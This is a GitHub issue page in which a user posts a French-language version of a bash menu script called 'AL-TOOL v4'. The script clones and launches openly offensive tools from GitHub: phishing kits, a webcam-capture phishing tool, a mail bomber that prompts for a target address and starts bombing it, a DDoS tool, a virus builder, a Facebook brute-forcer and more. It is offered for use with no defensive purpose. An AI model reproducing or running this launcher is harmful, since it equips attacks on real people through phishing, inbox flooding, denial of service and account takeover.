Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Një version frëngjisht - A French version #13

Open
MysterePMS opened this issue Dec 25, 2024 · 0 comments
Open

Një version frëngjisht - A French version #13

MysterePMS opened this issue Dec 25, 2024 · 0 comments

Comments

@MysterePMS
Copy link

clear
mkdir Tools
clear
echo -e '\033[31;40;1m
█████╗ ██╗ ████████╗ ██████╗ ██████╗ ██╗
██╔══██╗██║ ╚══██╔══╝██╔═══██╗██╔═══██╗██║
███████║██║ ███████╗ ██║ ██║ ██║██║ ██║██║
██╔══██║██║ ╚══════╝ ██║ ██║ ██║██║ ██║██║
██║ ██║███████╗ ██║ ╚██████╔╝╚██████╔╝███████╗
╚═╝ ╚═╝╚══════╝ ╚═╝ ╚═════╝ ╚═════╝ ╚══════╝ v4
Codé par 4lbH4cker
github: https://github.com/4lbH4cker
\033[33;4mVersion:\033[0m 4 \033[33;4mCTRL+C:\033[0m quitter \033[33;4mAuteur:\033[0m 4lbH4cker

\e[37m[1]\e[36m Prérequis & Mise à jour \e[37m[2]\e[36m Outil de Phishing
\e[37m[3]\e[36m Hack Webcam \e[37m[4]\e[36m Subscan
\e[37m[5]\e[36m Gmail Bomber \e[37m[6]\e[36m Attaque DDOS
\e[37m[7]\e[36m Comment utiliser ? \e[37m[8]\e[36m Désinstaller les programmes téléchargés
\e[37m[9]\e[36m Infos IP \e[37m[10]\e[36m dorks-eye
\e[37m[11]\e[36m HackerPro \e[37m[12]\e[36m RED_HAWK
\e[37m[13]\e[36m VirusCrafter \e[37m[14]\e[36m Info-Site
\e[37m[15]\e[36m BadMod \e[37m[16]\e[36m Facebash
\e[37m[17]\e[36m DARKARMY \e[37m[18]\e[36m CHANGEUR-AUTO-IP

'

Choix de l'option

read -p "Numéro de transaction : " islem
if [[ $islem == 1 || $islem == 01 ]]; then
clear

echo -e "\033[47;31;5m Installation des mises à jour et des prérequis...\033[0m"
sleep 5
pkg install git -y
pkg install python python3 -y
pkg install pip pip3 -y
pkg install curl -y
apt update
apt upgrade -y
clear
echo -e "\033[47;3;35m Mise à jour complète...\033[0m"
sleep 3
bash alhack.sh

elif [[ $islem == 2 || $islem == 02 ]]; then
clear
echo -e "\033[47;3;35m L'installation peut prendre un peu de temps\033[0m"
sleep 3
cd Tools
git clone https://github.com/htr-tech/zphisher
cd zphisher
bash zphisher.sh

elif [[ $islem == 3 || $islem == 03 ]]; then
clear
echo -e "\033[47;3;35m L'installation peut prendre un peu de temps\033[0m"
sleep 3
cd Tools
git clone https://github.com/techchipnet/CamPhish
cd CamPhish
bash camphish.sh

elif [[ $islem == 4 || $islem == 04 ]]; then
clear
echo -e "\033[47;3;35m L'installation peut prendre un peu de temps\033[0m"
sleep 3
git clone https://github.com/zidansec/subscan
cd subscan
read -p "Entrez un domaine par exemple (example.com) : " sc
./subscan $sc

elif [[ $islem == 5 || $islem == 05 ]]; then
clear
echo -e "\033[47;3;35m L'installation peut prendre un peu de temps\033[0m"
sleep 3
cd Tools
git clone https://github.com/juzeon/fast-mail-bomber.git
cd fast-mail-bomber/
mv config.example.php config.php
php index.php update-providers
rm -rf data/nodes.json data/dead_providers.json
echo -e "\033[47;3;35m Cette installation prendra beaucoup de temps\033[0m"
echo -e "\033[47;3;35m Pour arrêter, appuyez sur Ctrl+C\033[0m"
sleep 4
php index.php update-nodes
php index.php refine-nodes
echo "-------------------------"
read -p "Entrez une adresse email à bombarder : " mail
echo "-------------------------"
php index.php start-bombing $mail

elif [[ $islem == 6 || $islem == 06 ]]; then
clear
echo -e "\033[47;3;35m L'installation peut prendre un peu de temps\033[0m"
sleep 3
cd Tools
git clone https://github.com/palahsu/DDoS-Ripper.git
cd DDoS-Ripper
python3 DRipper.py
echo ""
echo -e "\033[47;3;35m Avant de l'utiliser, supprimez votre IP\033[0m"

elif [[ $islem == 7 || $islem == 07 ]]; then
clear
echo "Vidéo YouTube : https://www.youtube.com/watch?v=zgdq6ErscqY"
python3 -m webbrowser https://www.youtube.com/watch?v=zgdq6ErscqY
sleep 10
echo "Attendez 10 secondes"
bash alhack.sh

elif [[ $islem == 8 || $islem == 08 ]]; then
clear
echo -e "\033[47;3;35m NE SUPPRIMEZ PAS LES PROGRAMMES TÉLÉCHARGÉS...\033[0m"
sleep 3
rm -rf Tools

bash alhack.sh

elif [[ $islem == 9 || $islem == 09 ]]; then
clear
echo -e "\033[47;3;35m L'installation peut prendre un peu de temps\033[0m"
sleep 3
cd Tools
apt update
apt install git curl
git clone https://github.com/htr-tech/track-ip.git
cd track-ip
bash trackip

elif [[ $islem == 10 || $islem == 010 ]]; then
clear
echo -e "\033[47;3;35m L'installation peut prendre un peu de temps\033[0m"
sleep 3
cd Tools
git clone https://github.com/BullsEye0/dorks-eye.git
cd dorks-eye
pip install -r requirements.txt
python3 dorks-eye.py

elif [[ $islem == 11 || $islem == 011 ]]; then
clear
echo -e "\033[47;3;35m L'installation peut prendre un peu de temps\033[0m"
sleep 3
cd Tools
apt update && apt upgrade -y && apt install git -y && apt install python2 -y
git clone https://github.com/jaykali/hackerpro.git
cd hackerpro
sudo bash install.sh
python2 hackerpro.py

elif [[ $islem == 12 || $islem == 012 ]]; then
clear
echo -e "\033[47;3;35m L'installation peut prendre un peu de temps\033[0m"
sleep 3
cd Tools
git clone https://github.com/Tuhinshubhra/RED_HAWK
cd RED_HAWK
php rhawk.php

elif [[ $islem == 13 || $islem == 013 ]]; then
clear
echo -e "\033[47;3;35m L'installation peut prendre un peu de temps\033[0m"
sleep 3
cd Tools
git clone https://github.com/Devil-Tigers/TigerVirus
apt update
apt upgrade -y
pkg install git -y
cd TigerVirus
bash app.sh

elif [[ $islem == 14 || $islem == 014 ]]; then
clear
echo -e "\033[47;3;35m L'installation peut prendre un peu de temps\033[0m"
sleep 3
cd Tools
pkg install curl -y
upgrade -y
pkg install git -y
git clone https://github.com/king-hacking/info-site.git
cd info-site
bash info.sh

elif [[ $islem == 15 || $islem == 015 ]]; then
clear
echo -e "\033[47;3;35m L'installation peut prendre un peu de temps\033[0m"
sleep 3
cd Tools
sudo apt-get update
sudo apt-get install php
sudo apt-get install php-curl
git clone https://github.com/MrSqar-Ye/BadMod.git
cd BadMod
chmod u+x INSTALL
chmod u+x BadMod.php
sudo php BadMod.php

elif [[ $islem == 16 || $islem == 016 ]]; then
clear
echo -e "\033[47;3;35m L'installation peut prendre un peu de temps\033[0m"
sleep 3
cd Tools
git clone https://github.com/fu8uk1/facebash
cd facebash
bash install.sh
chmod +x facebash.sh
tor
sudo ./facebash.sh

elif [[ $islem == 17 || $islem == 017 ]]; then
clear
echo -e "\033[47;3;35m L'installation peut prendre un peu de temps\033[0m"
sleep 3
cd Tools
pkg install git
pkg install python2
apt install git
apt install python2
git clone https://github.com/D4RK-4RMY/DARKARMY
cd DARKARMY
chmod +x darkarmy.py
python2 darkarmy.py

elif [[ $islem == 18 || $islem == 018 ]]; then
clear
echo -e "\033[47;3;35m L'installation peut prendre un peu de temps\033[0m"
echo -e "\033[47;3;35m Cet outil vous demandera d'être (ROOT)\033[0m"
sleep 3
cd Tools
sudo apt-get install tor
pip3 install requests
git clone https://github.com/FDX100/Auto_Tor_IP_changer.git
cd Auto_Tor_IP_changer
echo -e "\033[47;3;35m Allez dans votre navigateur / changez le proxy SOCKS en 127.0.0.1:9050\033[0m"
sleep 8
python3 install.py
aut

else
clear
echo -e '\033[36;40;1m Vous avez entré un code incorrect'
sleep 1
clear
bash alhack.sh
fi

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

1 participant